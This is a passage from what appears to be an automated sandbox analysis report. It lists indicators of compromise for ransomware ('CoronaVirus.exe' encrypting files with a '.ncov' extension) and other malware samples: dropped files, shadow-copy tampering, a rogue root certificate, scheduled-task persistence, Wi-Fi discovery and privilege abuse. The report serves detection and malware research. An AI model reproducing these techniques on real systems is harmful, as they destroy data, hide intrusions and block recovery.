Office\Office16\DCF\Infragistics2.Win.UltraWinTree.v11.1.dll.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Microsoft.Terminal.Settings.Editor\GlobalAppearance.xaml CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\BASMLA.XSL.id-1686D269.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\ui-strings.js.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QRYINT32.DLL CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\nl\msipc.dll.mui CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\PilotshubApp.exe CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription4-ul-oob.xrm-ms.id-1686D269.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ppd.xrm-ms.id-1686D269.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\PREVIEW.GIF.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN058.XML.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.scale-100_contrast-black.png CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\System.Windows.Forms.resources.dll.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\main-selector.css CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-runtime-l1-1-0.dll CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-ul-phn.xrm-ms.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\models\en-GB.PostalAddress.ot CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icucnv40.dll.id-1686D269.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\ui-strings.js.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_MAK_AE-ul-oob.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pj11icon.exe CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-pl.xrm-ms.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr\UIAutomationClientSideProviders.resources.dll CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_2020.812.2125.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_1.0.22.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-40.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\ui-strings.js.id-1686D269.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Resources.Writer.dll.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\WindowsBase.resources.dll.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorLargeTile.scale-125_contrast-black.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_KMS_Client-ul-oob.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe CoronaVirus.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.it-it.dll CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-20_altform-lightunplated_contrast-white.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib\aria.js CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja\System.Xaml.resources.dll.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN102.XML.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-96_altform-unplated.png CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses_selected.svg CoronaVirus.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\edit-pdf-2x.png.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_PrepidBypass-ul-oob.xrm-ms.id-1686D269.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTest-pl.xrm-ms.id-1686D269.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.ReportDesign.Common.dll.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\AssetLibrary.ico.id-1686D269.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-140.png.id-1686D269.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\GetHelpAppList.targetsize-20_altform-lightunplated.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_1.0.38.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-24.png CoronaVirus.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File opened for modification C:\Windows\HardlyAircraft splwow64_1.exe File opened for modification C:\Windows\BrandonBlind splwow64_1.exe File created C:\Windows\Tasks\Gxtuum.job ctx.exe File opened for modification C:\Windows\SanyoToday 0b44ippu.exe File opened for modification C:\Windows\HimselfConsumption 0b44ippu.exe File created C:\Windows\sysnldcvmr.exe m.exe File opened for modification C:\Windows\ViewpictureKingdom splwow64_1.exe File opened for modification C:\Windows\IpaqArthur splwow64_1.exe File opened for modification C:\Windows\DeletedWilliam 0b44ippu.exe File opened for modification C:\Windows\BookmarkRolling 0b44ippu.exe File opened for modification C:\Windows\sysnldcvmr.exe m.exe -
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 11224 sc.exe 4500 sc.exe 6344 sc.exe 10764 sc.exe 11328 sc.exe 6448 sc.exe 9248 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Detects Pyinstaller 4 IoCs
resource yara_rule behavioral1/files/0x001900000002ab47-59.dat pyinstaller behavioral1/files/0x001900000002aca3-562.dat pyinstaller behavioral1/files/0x001e00000002ace4-956.dat pyinstaller behavioral1/files/0x00020000000258e5-1013.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 7 IoCs
pid pid_target Process procid_target 4484 3976 WerFault.exe 84 3468 1500 WerFault.exe 158 2936 3484 WerFault.exe 215 1712 840 WerFault.exe 342 9784 16324 WerFault.exe 578 2016 16324 WerFault.exe 578 13884 7480 WerFault.exe 570 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2983116002.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language del.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language splwow64_1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 563115859.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language softina.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CoronaVirus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language run.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ssg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 31329958.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ctx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0b44ippu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language evetbeta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chrome.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Plates.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [UPG]CSS.new.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vtoroy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language D6BF.tmp.ssg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GOLD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build_2024-07-25_20-56.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5044 netsh.exe 1816 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build_2024-07-25_20-56.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build_2024-07-25_20-56.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 15216 timeout.exe 16340 timeout.exe 10528 timeout.exe 1684 timeout.exe 4596 timeout.exe 5040 timeout.exe 16268 timeout.exe 232 timeout.exe 3084 timeout.exe 3008 timeout.exe -
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 10824 vssadmin.exe 2804 vssadmin.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ Explorer.EXE -
Modifies registry key 1 TTPs 1 IoCs
pid Process 6016 reg.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 9516 schtasks.exe 8468 schtasks.exe 11272 schtasks.exe 1692 schtasks.exe 3480 schtasks.exe 3388 schtasks.exe 2696 schtasks.exe 3320 schtasks.exe 4584 schtasks.exe 16228 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3976 build_2024-07-25_20-56.exe 3976 build_2024-07-25_20-56.exe 3976 build_2024-07-25_20-56.exe 3976 build_2024-07-25_20-56.exe 3976 build_2024-07-25_20-56.exe 3976 build_2024-07-25_20-56.exe 3496 1613621604.exe 3268 d4cye08a.exe 3268 d4cye08a.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4536 svchost.exe 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3312 Explorer.EXE 9072 srtware.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2352 4363463463464363463463463.exe Token: SeDebugPrivilege 4536 svchost.exe Token: SeDebugPrivilege 1216 tasklist.exe Token: SeDebugPrivilege 3792 tasklist.exe Token: SeDebugPrivilege 5040 tasklist.exe Token: SeDebugPrivilege 4832 tasklist.exe Token: SeDebugPrivilege 476 tasklist.exe Token: SeDebugPrivilege 4864 tasklist.exe Token: SeDebugPrivilege 1876 tasklist.exe Token: SeDebugPrivilege 1176 tasklist.exe Token: SeDebugPrivilege 256 tasklist.exe Token: SeDebugPrivilege 1724 uctgkfb7.exe Token: SeDebugPrivilege 1336 tasklist.exe Token: SeDebugPrivilege 4432 tasklist.exe Token: SeDebugPrivilege 4680 tasklist.exe Token: SeDebugPrivilege 1472 tasklist.exe Token: SeDebugPrivilege 652 Client-built.exe Token: SeDebugPrivilege 3496 1613621604.exe Token: SeDebugPrivilege 2644 tasklist.exe Token: SeDebugPrivilege 5028 Client.exe Token: SeDebugPrivilege 3716 tasklist.exe Token: SeDebugPrivilege 1776 tasklist.exe Token: SeDebugPrivilege 2116 tasklist.exe Token: SeDebugPrivilege 4480 tasklist.exe Token: SeDebugPrivilege 1192 tasklist.exe Token: SeDebugPrivilege 1932 tasklist.exe Token: SeDebugPrivilege 2080 tasklist.exe Token: SeDebugPrivilege 1260 tasklist.exe Token: SeDebugPrivilege 4264 tasklist.exe Token: SeDebugPrivilege 4220 tasklist.exe Token: SeDebugPrivilege 3724 tasklist.exe Token: SeDebugPrivilege 5044 tasklist.exe Token: SeDebugPrivilege 3484 Client_protected.exe Token: SeDebugPrivilege 1156 WallpaperX.exe Token: SeIncreaseQuotaPrivilege 3484 Client_protected.exe Token: SeSecurityPrivilege 3484 Client_protected.exe Token: SeTakeOwnershipPrivilege 3484 Client_protected.exe Token: SeLoadDriverPrivilege 3484 Client_protected.exe Token: SeSystemProfilePrivilege 3484 Client_protected.exe Token: SeSystemtimePrivilege 3484 Client_protected.exe Token: SeProfSingleProcessPrivilege 3484 Client_protected.exe Token: SeIncBasePriorityPrivilege 3484 Client_protected.exe Token: SeCreatePagefilePrivilege 3484 Client_protected.exe Token: SeBackupPrivilege 3484 Client_protected.exe Token: SeRestorePrivilege 3484 Client_protected.exe Token: SeShutdownPrivilege 3484 Client_protected.exe Token: SeDebugPrivilege 3484 Client_protected.exe Token: SeSystemEnvironmentPrivilege 3484 Client_protected.exe Token: SeRemoteShutdownPrivilege 3484 Client_protected.exe Token: SeUndockPrivilege 3484 Client_protected.exe Token: SeManageVolumePrivilege 3484 Client_protected.exe Token: 33 3484 Client_protected.exe Token: 34 3484 Client_protected.exe Token: 35 3484 Client_protected.exe Token: 36 3484 Client_protected.exe Token: SeIncreaseQuotaPrivilege 3484 Client_protected.exe Token: SeSecurityPrivilege 3484 Client_protected.exe Token: SeTakeOwnershipPrivilege 3484 Client_protected.exe Token: SeLoadDriverPrivilege 3484 Client_protected.exe Token: SeSystemProfilePrivilege 3484 Client_protected.exe Token: SeSystemtimePrivilege 3484 Client_protected.exe Token: SeProfSingleProcessPrivilege 3484 Client_protected.exe Token: SeIncBasePriorityPrivilege 3484 Client_protected.exe Token: SeCreatePagefilePrivilege 3484 Client_protected.exe -
Suspicious use of FindShellTrayWindow 17 IoCs
pid Process 1080 wget.exe 4564 wget.exe 5028 Client.exe 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 4484 wget.exe 2692 wget.exe 652 [UPG]CSS.exe 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 14544 evetbeta.exe 3064 Plates.pif 3064 Plates.pif 3064 Plates.pif -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5028 Client.exe 4504 Waters.pif 4504 Waters.pif 4504 Waters.pif 652 [UPG]CSS.exe 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 14544 evetbeta.exe 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3064 Plates.pif 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 5028 Client.exe 652 [UPG]CSS.exe 652 [UPG]CSS.exe 652 [UPG]CSS.exe 652 [UPG]CSS.exe 2504 [UPG]CSS.new.exe 2504 [UPG]CSS.new.exe 3600 [UPG]CSS.exe 3600 [UPG]CSS.exe 3600 [UPG]CSS.exe 3600 [UPG]CSS.exe 7964 fras.exe -
Suspicious use of WriteProcessMemory 64 IoCs
